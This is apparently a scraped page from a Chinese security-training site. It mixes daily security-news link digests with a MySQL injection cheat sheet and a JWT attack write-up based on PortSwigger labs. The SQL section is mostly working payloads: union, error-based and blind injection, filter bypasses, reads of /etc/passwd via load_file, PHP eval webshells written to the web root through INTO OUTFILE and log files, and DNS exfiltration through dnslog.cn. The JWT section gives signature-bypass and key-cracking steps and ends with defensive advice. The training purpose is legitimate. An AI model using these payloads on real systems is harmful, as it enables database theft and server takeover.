蚁景网安 - 网络安全人才培养服务提供商

网络安全日报 2022年08月11日

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、NetModule 路由器软件 (NRSW) 中发现新的严重漏洞 https://www.securityweek.com/organizations-warned-critical-vulnerabilities-netmodule-routers 2、英特尔修补固件、管理软件中的严重漏洞 https://www.securityweek.com/intel-patches-severe-vulnerabilities-firmware-management-software 3、UnRAR 漏洞(CVE-2022-30333)被利用，可用于入侵 Zimbra 服务器 https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers 4、思科披露5月下旬被Yanluowang勒索组织入侵并窃取了内部数据 https://securityaffairs.co/wordpress/134278/hacking/yanluowang-ransomware-hacked-cisco.html 5、Microsoft Edge 通过增强的安全模式加强对恶意网站的防御 https://portswigger.net/daily-swig/microsoft-edge-deepens-defenses-against-malicious-websites-with-enhanced-security-mode 6、研究人员发现10个恶意PyPI包窃取开发者凭据 https://www.bleepingcomputer.com/news/security/10-malicious-pypi-packages-found-stealing-developers-credentials/ 7、Reddit中的IDOR漏洞允许攻击者提权 https://portswigger.net/daily-swig/simple-idor-vulnerability-in-reddit-allowed-mischief-makers-to-perform-mod-actions 8、微软警告称配备最新 CPU 的 Windows 设备容易受到数据损坏 https://www.bleepingcomputer.com/news/microsoft/windows-devices-with-newest-cpus-are-susceptible-to-data-damage/ 9、ChekPoint报告显示全球网络攻击激增 42%，勒索软件成为头号威胁 https://www.ithome.com/0/633/868.htm 10、电子邮件营销公司Klaviyo被攻击，数据已泄露 https://www.bleepingcomputer.com/news/security/email-marketing-firm-hacked-to-steal-crypto-focused-mailing-lists/

数据库注入提权总结（二）

网络安全日报 2022年08月10日

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软周二修复了118个漏洞，包括一个0day漏洞（CVE-2022-34713） https://www.securityweek.com/already-exploited-zero-day-headlines-microsoft-patch-tuesday 2、VMware确定高危漏洞CVE-2022-31656利用代码已被公开 https://www.securityweek.com/exploit-code-published-critical-vmware-security-flaw 3、研究人员披露了一种新的英特尔 CPU 攻击方法- ÆPIC Leak https://www.securityweek.com/aepic-leak-architectural-bug-intel-cpus-exposes-protected-data 4、 AMD CPU 受"SQUIP"侧信道攻击的影响，可被获取敏感数据 https://www.securityweek.com/amd-processors-expose-sensitive-data-new-squip-attack 5、Adobe发布补丁修复了Acrobat、Reader 中的代码执行漏洞 https://www.securityweek.com/adobe-patch-tuesday-code-execution-flaws-acrobat-reader 6、研究人员将Maui 勒索软件与朝鲜 Andariel APT 关联 https://securityaffairs.co/wordpress/134195/malware/maui-ransomware-andariel-apt.html 7、研究人员在新加坡发现了Classiscam诈骗即服务业务 https://thehackernews.com/2022/08/researchers-uncover-classiscam-scam-as.html 8、黑客使用SHARPEXT浏览器扩展监视Gmail和Aol用户 https://www.hackread.com/nkorea-hackers-sharpext-browser-malware-gmail/ 9、我国 IPv6 网络“高速公路”全面建成：活跃用户达 6.93 亿 https://www.ithome.com/0/633/812.htm 10、以色列警方Pegasus间谍软件原型被曝光 https://www.cnbeta.com/articles/tech/1301271.htm

数据库注入提权总结（一）

MYSQL 基础注入联合查询若前面的查询结果不为空，则返回两次查询的值：若前面的查询结果为空，则只返回union查询的值：关键字union select 需要字段数对应常用Payload： # 查询表名 ' union select group_concat(table_name) from information_schema.tables where table_schema=database()%23 # 查询字段名 ' union select group_concat(column_name) from information_schema.columns where table_name='table1'%23 报错注入报错注入是利用mysql在出错的时候会引出查询信息的特征，常用的报错手段有如下10种： # 修改select user() 字段获取不同的信息 # 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); # 2.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); # 3.updatexml() select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); # 4.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); # 5.multipoint() select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6.polygon() select * from test where id=1 and polygon((select * from(select * from(select user())a)b)); 7.multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8.linestring() select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9.multilinestring() select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10.exp() select * from test where id=1 and exp(~(select * from(select user())a)); 布尔盲注常见的布尔盲注场景有两种，一是返回值只有True或False的类型，二是Order by盲注。返回值只有True或False的类型如果查询结果不为空，则返回True（或者是Success之类的），否则返回False 这种注入比较简单，可以挨个猜测表名、字段名和字段值的字符，通过返回结果判断猜测是否正确例：parameter=’ or ascii(substr((select database()) ,1,1))<115—+ Orderby盲注 order by rand(True)和order by rand(False)的结果排序是不同的，可以根据这个不同来进行盲注：例：order by rand(database()='pdotest') 返回了True的排序，说明database()=’pdotest’是正确的值时间盲注其实大多数页面，即使存在sql注入也基本是不会有回显的，因此这时候就要用延时来判断查询的结果是否正确。常见的时间盲注有： 1.sleep(x) id=' or sleep(3)%23 id=' or if(ascii(substr(database(),1,1))>114,sleep(3),0)%23 查询结果正确，则延迟3秒，错误则无延时。 2.benchmark() 通过大量运算来模拟延时： id=' or benchmark(10000000,sha(1))%23 id=' or if(ascii(substr(database(),1,1))>114,benchmark(10000000,sha(1)),0)%23 本地测试这个值大约可延时3秒： 3.笛卡尔积计算笛卡尔积也是通过大量运算模拟延时： select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C select balabala from table1 where '1'='2' or if(ascii(substr(database(),1,1))>0,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C),0) 笛卡尔积延时大约也是3秒 HTTP头注入注入手法和上述相差不多，就是注入点发生了变化 HTTP分割注入常见场景,登录处SQL语句如下，注释符号被过滤 select xxx from xxx where username=’xxx’ and password=’xxx’# 方法一 username=1' or extractvalue/* password=1*/(1,concat(0x7e,(select database()),0x7e))or' SQL语句最终变为 select xxx from xxx where username='1' or extractvalue/*’ and password=’*/(1,concat(0x7e,(select database()),0x7e))or'' # 方法二 username=1' or if(ascii(substr(database(),1,1))=115,sleep(3),0) or '1 password=1 select * from users where username='1' or if(ascii(substr(database(),1,1))>0,sleep(3),0) or '1' and password='1' 二次注入二次注入主要出现在update和select结合点，如注册之后在登录攻击者构造的恶意payload首先会被服务器存储在数据库中，在之后取出数据库在进行SQL语句拼接时产生的SQL注入问题 SQL约束攻击假如注册时username参数在mysql中为字符串类型，并且有unique属性，设置了长度为VARCHAR(20)。则我们注册一个username为admin[20个空格]asd的用户名，则在mysql中首先会判断是否有重复，若无重复，则会截取前20个字符加入到数据库中，所以数据库存储的数据为admin[20个空格]，而进行登录的时候，SQL语句会忽略空格，因此我们相当于覆写了admin账号。基础绕过大小写绕过用于过滤时没有匹配大小写的情况： SelECt * from table; 双写绕过用于将禁止的字符直接删掉的过滤情况如： preg_replace(‘/select/‘,’’,input) 则可用seselectlect from xxx来绕过，在删除一个select后剩下的就是select from xxx 绕过空格当空格被过滤时，可以使用/**/ () %0a %09进行绕过使用16进制绕过特定字符如果在查询字段名的时候表名被过滤，或是数据库中某些特定字符被过滤，则可用16进制绕过： select column_name from information_schema.columns where table_name=0x7573657273; 0x7573657273为users的16进制只能针对表名，字段名等，内置函数关键字，不能使用16进制替代宽字节、Latin1默认编码宽字节注入用于单引号被转义，但编码为gbk编码的情况下，用特殊字符将其与反斜杠合并，构成一个特殊字符： username = %df'# 经gbk解码后变为： select * from users where username ='運'# 成功闭合了单引号。 Latin1编码 Mysql表的编码默认为latin1，如果设置字符集为utf8，则存在一些latin1中有而utf8中没有的字符，而Mysql是如何处理这些字符的呢？直接忽略于是我们可以输入?username=admin%c2，存储至表中就变为了admin 上面的%c2可以换为%c2-%ef之间的任意字符常见字符的替代 and -> && or -> || 空格-> /**/ -> %a0 -> %0a -> + # -> --+ -> ;%00(php<=5.3.4) -> or '1'='1 = -> like -> regexp -> <> -> in 注：regexp为正则匹配，利用正则会有些新的注入手段逗号被过滤 # 用join代替： -1 union select 1,2,3 -1 union select * from (select 1)a join (select 2)b join (select 3)c%23 # limit： limit 2,1 limit 1 offset 2 # substr: substr(database(),5,1) substr(database() from 5 for 1) from为从第几个字符开始，for为截取几个 substr(database() from 5) # 如果for也被过滤了 mid(REVERSE(mid(database()from(-5)))from(-1)) reverse是反转，mid和substr等同 # if: if(database()=’xxx’,sleep(3),1) id=1 and databse()=’xxx’ and sleep(3) select case when database()=’xxx’ then sleep(5) else 0 end limit被过滤 select user from users limit 1 加限制条件，如： select user from users group by user_id having user_id = 1 (user_id是表中的一个column) information_schema被过滤 innodb引擎可用mysql.innodb_table_stats、innodb_index_stats，日志将会把表、键的信息记录到这两个表中除此之外，系统表sys.schema_table_statistics_with_buffer、sys.schema_auto_increment_columns用于记录查询的缓存，某些情况下可代替information_schema 文件读写读写权限在进行MySQL文件读写操作之前要先查看是否拥有权限，mysql文件权限存放于mysql表的file_priv字段，对应不同的User，如果可以读写，则数据库记录为Y，反之为N：我们可以通过user()查看当前用户是什么，如果对应用户具有读写权限，则往下看，反之则放弃这条路找其他的方法。除了要查看用户权限，还有一个地方要查看，即secure-file-priv。它是一个系统变量，用于限制读写功能，它的值有三种：（1）无内容，即无限制（2）为NULL，表示禁止文件读写（3）为目录名，表示仅能在此目录下读写该配置项存放在my.ini中，修改之后必须重启mysql重新加载配置文件读文件如果满足上述2个条件，则可尝试读写文件了。常用的读文件的语句有如下几种： select load_file(file_path); load data infile "/etc/passwd" into table 库里存在的表名 FIELDS TERMINATED BY 'n'; #读取服务端文件 load data local infile "/etc/passwd" into table 库里存在的表名 FIELDS TERMINATED BY 'n'; #读取客户端文件需要注意的是，file_path必须为绝对路径，且反斜杠需要转义：写文件 select 1,"<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/1.php'; select 2,"<?php eval($_POST['cmd']);?>" into dumpfile '/var/www/html/1.php'; 当secure_file_priv值为NULL时，可用生成日志的方法绕过： set global general_log_file = '/var/www/html/1.php'; set global general_log = on; 日志除了general_log还有其他许多日志，实际场景中需要有足够的写入日志的权限，且需要堆叠注入的条件方可采用该方法，因此利用非常困难。 DNS外带注入若用户访问DNS服务器，则会在DNS日志中留下记录。如果请求中带有SQL查询的信息，则信息可被带出到DNS记录中。利用条件： 1.secure_file_priv为空且有文件读取权限 2.目标为windows（利用了UNC，Linux不可行） 3.无回显且无法时间盲注利用方法：可以找一个免费的DNSlog：http://dnslog.cn/ 进入后可获取一个子域名，执行： select load_file(concat('\\',(select database()),'.子域名.dnslog.cn')); 相当于访问了select database().子域名.dnslog.cn，于是会留下DNSLOG记录，可从这些记录中查看SQL返回的信息。 mysql getshell 文件导出函数GetShell 利用条件数据库当前用户为root权限知道当前网站的绝对路径 PHP的GPC为off状态写入的那个歌路径存在写入权限基于联合查询时 ?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '网站根目录绝对路径'-- qwe ?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '网站根目录绝对路径'-- qwe 非联合查询 ?id=1 into outfile '网站根目录绝对路径' FIELDS TERMINATED BY '<?php phpinfo();?>'-- qwe 这个语句的意思是，导出当前数据表到xxx文件中，数据表中的字段以<?php phpinfo();?>分隔形如： id username password 导出后会变成 id<?php phpinfo();?>username<?php phpinfo();?>password outfile和dumpfile的区别 outfile: 支持多行数据同时导出使用union联合查询时，要保证两侧查询的列数相同会在换行符制表符后面追加反斜杠会在末尾追加换行 dumpfile: 每次只能导出一行数据不会在换行符制表符后面追加反斜杠不会在末尾追加换行因此，dumpfile函数这个函数来顺利写入二进制文件，当然into outfile函数也可以写入二进制文件，但是无法生效（追加的反斜杠会使二进制文件无法生效），当使用dumpfile函数时，应该手动添加limit限制来获取不同的行数。 secure_file_prive 写文件提权，终究是离不开这个配置项： secure_file_prive= ，结果为空的话，表示允许任何文件读写 secure_file_prive=NULL，表示不允许任何文件读写 secure_file_prive=‘某个路径’，表示这个路径作为文件读写的路径在mysql5.5版本前，都是默认为空，允许读取在mysql5.6版本后 ,默认为NULL，并且无法用SQL语句对其进行修改。所以这种只能在配置进行修改。查询该参数配置的情况： show global variables like "%secure%"; 利用sql语句修改配置项（5.6版本以前，临时修改重启失效）： set global secure_file_prive="" 5.6版本以后，只能利用配置项修改：日志GetShell 全局日志Getshell 利用general_log，可以将所有到达mysql服务器的sql语句，都记录下来 # 查看日志是否开启 show variables like 'general_log'; # 开启日志功能 set global geeral_log=on; # 查看文件日志保存位置 show variables like 'general_log_file'; # 设置日志保存位置（getshell的话存放在网站根目录，名为.php） set global general_log_file='/var/www/html/shell.php'; # 查看日志输出类型 table：将日志存入数据库的日志表中；file：将日志存入文件中 show variables like 'log_output'; # 修改日志存储类型 set global log_output='table/file'; GetShell方式： set global geeral_log=on; set global general_log_file='/var/www/html/shell.php'; select '<?php eval($_POST[8]);?>' 慢日志GetShell 一般都是通过long_query_time选项来设置这个时间值，时间以秒为单位，可以精确到微秒。如果查询时间超过了这个时间值（默认为10秒），这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式 # 查看服务器默认时间值方式 show global variables like '%long_query_time%' show global variables like '%long%' # 查看慢日志参数 show global variable like '%slow%'; GetShell方式： # 打开慢日志 set global slow_query_log=on # 设置慢日志路径 set global slow_query_log_file='/var/www/html/shell.php' # 记录到日志中的语句 select '<?php @eval($_POST[8]);?>' or sleep(20) 爆绝对路径的方法上述的提权方式都离不开知道网站的绝对路径，下面是一些得到绝对路径的方法。单引号爆路径直接在URL后面加单引号，要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。http://www.xxx.com/news.php?id=1′ 错误参数值爆路径将要提交的参数值改成错误值，比如-1。-99999单引号被过滤时不妨试试。http://www.xxx.com/researcharchive.php?id=-1 Google爆路径结合关键字和site语法搜索出错页面的网页快照，常见关键字有warning和fatal error。注意，如果目标站点是二级域名，site接的是其对应的顶级域名，这样得到的信息要多得多。 Site:xxx.edu.tw warning Site:xxx.com.tw “fatal error” 测试文件爆路径很多网站的根目录下都存在测试文件，脚本代码通常都是phpinfo()。 www.xxx.com/test.php www.xxx.com/ceshi.php www.xxx.com/info.php www.xxx.com/phpinfo.php www.xxx.com/php_info.php www.xxx.com/1.php phpmyadmin爆路径一旦找到phpmyadmin的管理页面，再访问该目录下的某些特定文件，就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫，也可以选择google。 /phpmyadmin/libraries/lect_lang.lib.php /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php load_file() /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php 配置文件找路径如果注入点有文件读取权限，就可以手工load_file或工具读取配置文件，再从中寻找路径信息（一般在文件末尾）。各平台下Web服务器和PHP的配置文件默认路径可以上网查，这里列举常见的几个。 Windows: c:\windows\php.ini php配置文件 c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件 Linux: /etc/php.ini php配置文件 /etc/httpd/conf.d/php.conf /etc/httpd/conf/httpd.conf Apache配置文件 /usr/local/apache/conf/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件 Linux 为什么要把Linux单独提出来说，因为Linux的权限控制很严格，有的时候即使我们完全控住了MYSQL 但是没有对网站根目录的读写权限，也会很没有办法去利用上述方法写shell。

网络安全日报 2022年08月09日

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、美国运通和 Snapchat 中的开放重定向漏洞在网络钓鱼攻击中被利用 https://www.securityweek.com/open-redirect-flaws-american-express-and-snapchat-exploited-phishing-attacks 2、员工的登录凭据被骗取后，Twilio 遭到黑客攻击 https://www.securityweek.com/twilio-hacked-after-employees-tricked-giving-login-credentials 3、360 Netlab 发现Orchard 僵尸网络利用比特币交易信息生成 DGA 域 https://securityaffairs.co/wordpress/134155/malware/orchard-botnet.html 4、英国紧急卫生服务因托管商遭受攻击而中断 https://www.bleepingcomputer.com/news/security/uk-nhs-suffers-outage-after-cyberattack-on-managed-service-provider/ 5、Zimbra企业邮件的漏洞已被黑客攻击利用 https://www.securityweek.com/zimbra-credential-theft-vulnerability-exploited-attacks 6、新的GwisinLocker勒索软件加密ESXi虚拟机 https://www.bleepingcomputer.com/news/security/new-gwisinlocker-ransomware-encrypts-windows-and-linux-esxi-servers/ 7、Lazarus组织冒充Coinbase攻击金融行业 https://www.bleepingcomputer.com/news/security/north-korean-hackers-target-crypto-experts-with-fake-coinbase-job-offers/ 8、黑客在Lucidchart上托管网络钓鱼页面 https://www.avanan.com/blog/hackers-host-phishing-pages-on-lucidchart 9、利用隐写术的恶意软件数量逐渐增多 https://blog.cyble.com/2022/08/04/stegomalware-identifying-possible-attack-vectors/ 10、超过60%的组织将SSH暴露在互联网上 https://www.infosecurity-magazine.com/news/over-60-organizations-expose-ssh/

浅析JWT安全问题

前不久研究websocket时发现port-swigger出了新的靶场，一看，发现是关于jwt安全的，刚好来总结回忆一下 JWT简介 Json web token (JWT)，是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准（RFC 7519） RFC 7519:https://datatracker.ietf.org/doc/html/rfc7519 他定义了一种紧凑且自包含的方式，用于在各方之间安全地传输信息作为 JSON 对象，特别适用于分布式站点的单点登录（SSO）场景 JWT与cookie/session的异同 ● JWT与cookie/session一样，都是作用于前后端认证 ● cookie/session：后端有个session，前端有个cookie，这样的基于session的认证会要求服务端不断存储用户登录信息，而随着不同客户端用户的增加，独立的服务器会逐渐无法承载更多的用户，导致其服务器的压力十分巨大，且cookie一旦被窃取还可能造成CSRF攻击 ● JWT：当我们把前后端分离开来，后端不再有session，当不再需要保存session文件，这就降低了服务端的负担，而我们就可以利用JWT这么一个基于token的鉴权认证，而基于token认证机制的应用就不需要去考虑用户在哪个服务器登录，客户端也可以将通过服务器认证后的json对象存储起来，下次访问时连同请求内容一同发送即可 JWT格式 JWT由Header、Payload、Signature组成 Header.Payload.Signature Header {"alg":"加密算法","typ":"JWT"} Payload iss: The issuer of the token sub: The subject of the token aud: The audience of the token exp: JWT expiration time defined in Unix time nbf: "Not before" time that identifies the time before which the JWT must not be accepted for processing iat: "Issued at" time, in Unix time, at which the token was issued jti: JWT ID claim provides a unique identifier for the JWT //可以自定义其它字段 Signature Signature = HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload),"secret") secret保存在后端，就是来解析确定验证的key JWT&JWS&JWE ● JWS，即JSON Web Signature，只是 JWT 的一种实现 ● JWE，即JSON Web Encryption，也只是 JWT 的一种实现潜在漏洞 ● 签名未校验 ● 算法被篡改 ● 敏感信息泄露 ● 加密算法不安全 ● 伪造密钥(CVE-2018-0114) JWT安全问题未对签名进行验证我们前面说过，JWT存在一个Signature 签名，如若没对签名进行认证，就可能存在越权情况靶场 Lab: JWT authentication bypass via unverified signature 解法 To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos. 我们需要把carlos删掉，而这就需要登录管理员账号，但是又没有给管理员的账号，只有一个普通用户，那我们就要想办法提升权限先抓包观察确定为JWT，将payload处字符base64解码得把sub的wiener修改为administrator，重新传参成功越权，然后就是删除用户即可未对加密算法进行强验证回顾一下Header的构成 {"alg":"加密算法","typ":"JWT"} 这里alg可以说明加密算法，但如果对该设置不进行强认证也会造成越权问题我们可以把加密算法设成none来进行验证绕过靶场 Lab: JWT authentication bypass via flawed signature verification 解法先和上题一致，将sub内容修改为administrator，然后发现还是没能成为管理员，接着修改header的alg为none，把后续的Signature删除，因为Signature是通过alg算法生成的，既然alg都为none了，那Signature也应该为空了成功变成管理员然后就是正常删除用户就行绕过弱签名密钥进行越权 Signature = HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload),"secret") 我们知道，签名存在一个secret密钥，这个一般都会保存在后端，别人无法查看，但是类同于弱口令，一旦这个密钥不复杂就有可能被爆破，gayhub上也有很多爆破的字典靶场 Lab: JWT authentication bypass via weak signing key 解法还是一样先抓包得到JWT 然后用到hashcat来进行爆破，kali自带 hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list 爆破得到secret为secret1 然后前往jwt.io生成我们需要的的jwt，把sub和secret进行修改重新传包，成功 JWT标头注入与很多注入一样，JWT标头注入也可大致分为两种情况，一是与数据库连接，搭配sql注入使用，一是不与数据库连接，单独进行越权操作通过jwk参数注入自签名的JWT 还记得我们说过的JWS吗 JWS，即JSON Web Signature，只是 JWT 的一种实现我们就可以通过JWK注入JWT，形成JWS 那什么是JWK呢 JWK 英文全称为 JSON Web Key，是一个JSON对象，表示一个加密的密钥，他不同于alg属性，JWK是可选的，以下就是一个示例 { "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG", "typ": "JWT", "alg": "RS256", "jwk": { "kty": "RSA", "e": "AQAB", "kid": "ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG", "n": "yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m" } } 在理想情况下，服务器应该是只使用公钥白名单来验证JWT签名的，但对于一些相关配置错误的服务器会用JWK参数中嵌入的任何密钥进行验证，攻击者就可以利用这一行为，用自己的RSA私钥对修改过的JWT进行签名，然后在JWK头部中嵌入对应的公钥进行越权操作靶场 Lab: JWT authentication bypass via jwk header injection 解法需要先安装一个插件，方便后续的操作然后正常抓包，将sub内容修改为administrator 然后切换到JWT Editor Keys选项new一个RSA Key 我是已经生成的了，然后保存后回到Repeater选择Embedded JWK攻击成功越权 JWT Editor 通过jku参数注入自签名的JWT 有些服务器并不会直接使用JWK头部参数来嵌入公钥，而是使用JKU（JWK Set URL）来引用一个包含了密钥的JWK Set，我们就可以借此来构造一个密钥从而实现越权操作靶场 Lab: JWT authentication bypass via jku header injection 解法先还是正常抓包修改sub内容，然后去到JWT Editor Keys生成一个RSA密钥，或者用上一道题目的也行，然后复制公钥然后加上key头 { "keys": [ ] } 保存到exploit的body中然后将kid修改成自己生成的JWK中的kid值，将jku的值改为exploit，使其导入然后回到点击下面的sign，选择Don’t modify header 模式，Sign 即可成功越权通过kid参数注入自签名的JWT 服务器可能会使用多个加密密钥来为不同类型的数据进行签名，出于这个原因，在JWT头部有时会包含一个kid参数，以避免服务器验证签名时出现错误，而在JWT规范中并没有对这个kid定义具体的结构，他仅仅是开发人员任意选择的一个字符串，可能只是一个指向数据库中的一个特定条目，甚至只是一个文件的名称也有可能而安全问题就出现在这里，一旦这个参数受到目录遍历影响，就易被攻击者使用服务器任意文件的文件名作为验证密钥形成攻击链靶场 Lab: JWT authentication bypass via kid header path traversal 解法先生成一个Symmetric Key，也就是对称密钥，并将 k 的值修改为 AA==即为null 然后抓包修改kid值和sub进行目录遍历 /dev/null是linux中的“黑洞”，代表空设备文件 /dev/null文件名与AA==一致都为null，对称密钥，应该可以成功绕过然后回到repeater点击sign选择OCT8 的密钥攻击成功越权其他有趣的JWT头部参数 ● cty（内容类型）如果已经找到了绕过签名验证的方法，可以尝试注入cty参数，将内容类型改为text/xml或application/x-java-serialized-object，这有可能为XXE和反序列化攻击提供新的向量。 ● x5c（X.509证书链）类似于上面讨论的jwk头部注入攻击，由于此标头参数可用于注入自签名证书，且由于 X.509 格式及其扩展的复杂性，引入这些证书时也有可能引入漏洞，可见CVE-2017-2800 和 CVE-2018-2633 JWT算法混淆 ● 即使服务器的密码是攻击者无法破解的复杂密码，但是由于JWT库的一些原生安全问题，攻击者可能会以开发者想不到的算法来伪造有效的JWT ● portswigges里也有相关靶场，目前尚未完全理解，先挖个坑，后续补上 JWT攻击的防御我们可以看到，JWT攻击千奇百怪，但是万变不离其宗，主要的潜在漏洞为 ● 签名未校验 ● 算法被篡改 ● 敏感信息泄露 ● 加密算法不安全 ● 伪造密钥我们也可围绕这些进行JWT攻击进行防御 ● 使用最新的 JWT 库，虽然最新版本的稳定性有待商榷，但是安全性都是较高的 ● 对 jku 标头进行严格的白名单设置 ● 确保 kid 标头不容易受到通过 header 参数进行目录遍历或 SQL 注入的攻击 ● 始终为颁发的任何令牌设置一个到期日 ● 尽可能避免通过URL参数发送令牌 ● 提供aud声明（或类似内容），以指定令牌的预期接收者，防止其应用在不同网站 ● 让颁发服务器能够撤销令牌

网络安全日报 2022年08月08日

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、F5 通过季度安全补丁修复了 21 个漏洞 https://www.securityweek.com/f5-fixes-21-vulnerabilities-quarterly-security-patches 2、Slack 在发现凭据泄露漏洞后强制重置了一部分用户密码 https://www.securityweek.com/slack-forces-password-resets-after-discovering-software-flaw 3、红绿灯协议 (TLP) 发布2.0版本 https://www.securityweek.com/traffic-light-protocol-20-brings-wording-improvements-label-changes 4、大规模的网络攻击袭击了德国工商会 (DIHK) 的网站 https://securityaffairs.co/wordpress/134121/hacking/dihk-cyberattack.html 5、GwisinLocker 勒索软件专门针对韩国 https://securityaffairs.co/wordpress/134105/cyber-crime/gwisinlocker-ransowmare-south-korea.html 6、Twitter 证实最近540 万个账户数据泄露是由于利用了0day漏洞造成的 https://securityaffairs.co/wordpress/134087/data-breach/twitter-zero-day-data-leak.html 7、美国 CISA 和澳大利亚 ACSC 发布 2021 年顶级恶意软件列表 https://www.cisa.gov/uscert/ncas/alerts/aa22-216a 8、研究人员发现劫持网络带宽而非算力的“挖矿”程序 https://blog.aquasec.com/cryptojacking-cloud-network-bandwidth 9、研究人员揭露“C2即服务(C2aaS)”的网络犯罪活动 https://securityaffairs.co/wordpress/134073/hacking/dark-utilities-c2-as-a-service.html 10、Mirai新变种RapperBot利用SSH暴力破解入侵Linux服务器 https://thehackernews.com/2022/08/new-iot-rapperbot-malware-targeting.html

利用PHP的特性做免杀Webshell

网络安全日报 2022年08月05日

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现影响数十万台 DrayTek Vigor 路由器的严重漏洞 https://www.securityweek.com/smbs-exposed-attacks-critical-vulnerability-draytek-vigor-routers2、思科小型企业路由器发布更新修补严重漏洞 https://www.securityweek.com/critical-vulnerabilities-allow-hacking-cisco-small-business-routers3、印度超过 2.8 亿条记录含 UAN、银行帐号、收入和 PF在网上泄露 https://ciso.economictimes.indiatimes.com/news/breaking-over-280m-records-including-uan-bank-account-info-and-pii-leaked-online/933337544、总部位于阿联酋的零售连锁 Spinneys 遭黑客攻击数据泄露 https://securereading.com/uae-spinneys-customer-data-leak/5、全新的 Woody RAT 恶意软件针对俄罗斯实体 https://securityaffairs.co/wordpress/134014/intelligence/woody-rat-targets-russia-orgs.html6、研究人员发现Go语言编写的LOLI Stealer窃密木马 https://blog.cyble.com/2022/08/03/loli-stealer-golang-based-infostealer-spotted-in-the-wild/7、暗网研究表明 87% 的勒索软件利用恶意宏 https://www.infosecurity-magazine.com/news/87-ransomware-brands-exploit-macros/8、微软宣布新的外部攻击面审计工具 https://www.bleepingcomputer.com/news/microsoft/microsoft-announces-new-external-attack-surface-audit-tool/9、VMware 敦促管理员立即修补关键的身份验证绕过漏洞 https://www.bleepingcomputer.com/news/security/vmware-urges-admins-to-patch-critical-auth-bypass-bug-immediately/10、FEMA 警告紧急警报系统可能被黑客入侵以传输虚假信息 https://edition.cnn.com/2022/08/03/politics/fema-emergency-alert-software-warning/index.html

Http-Sumggling缓存漏洞分析

